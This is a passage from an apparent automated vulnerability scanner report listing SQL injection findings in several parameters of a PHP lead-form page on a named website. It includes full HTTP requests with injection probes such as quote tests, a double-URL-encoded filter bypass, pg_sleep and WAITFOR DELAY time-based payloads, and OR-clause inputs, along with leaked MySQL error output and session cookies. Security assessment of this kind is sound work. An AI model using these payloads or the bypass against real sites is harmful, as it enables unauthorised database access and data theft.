Path:   /ppc/leadflow/hins00/project.php

Issue detail

The attributeId_489_t parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_489_t parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3'&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:15:19 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7094
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Yes - higher deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3''&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:15:20 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.345. http://www.insideup.com/ppc/leadflow/hins00/project.php [attributeId_491_t parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The attributeId_491_t parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the attributeId_491_t parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3%2527&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:01:42 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=inv5vvk0lr8gfil9sl875hu1c0; path=/
Content-Length: 7334
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5

1.346. http://www.insideup.com/ppc/leadflow/hins00/project.php [attributeId_491_t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The attributeId_491_t parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_491_t parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3'&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:16:11 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7094
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Yes - higher deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3''&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:16:12 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.347. http://www.insideup.com/ppc/leadflow/hins00/project.php [attributeId_492_t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The attributeId_492_t parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_492_t parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3'&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:01:48 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=iac47eta9cjbjnmorur6ig6tf4; path=/
Content-Length: 7318
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3''&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:01:48 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=2ct51nqi81700t5ijk7luooom3; path=/
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.348. http://www.insideup.com/ppc/leadflow/hins00/project.php [attributeId_493_t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The attributeId_493_t parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_493_t parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3'&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:19:16 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7094
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Yes - higher deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3''&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:19:17 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.349. http://www.insideup.com/ppc/leadflow/hins00/project.php [attributeId_493_t parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The attributeId_493_t parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_493_t parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3'&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:01:20 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7238
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
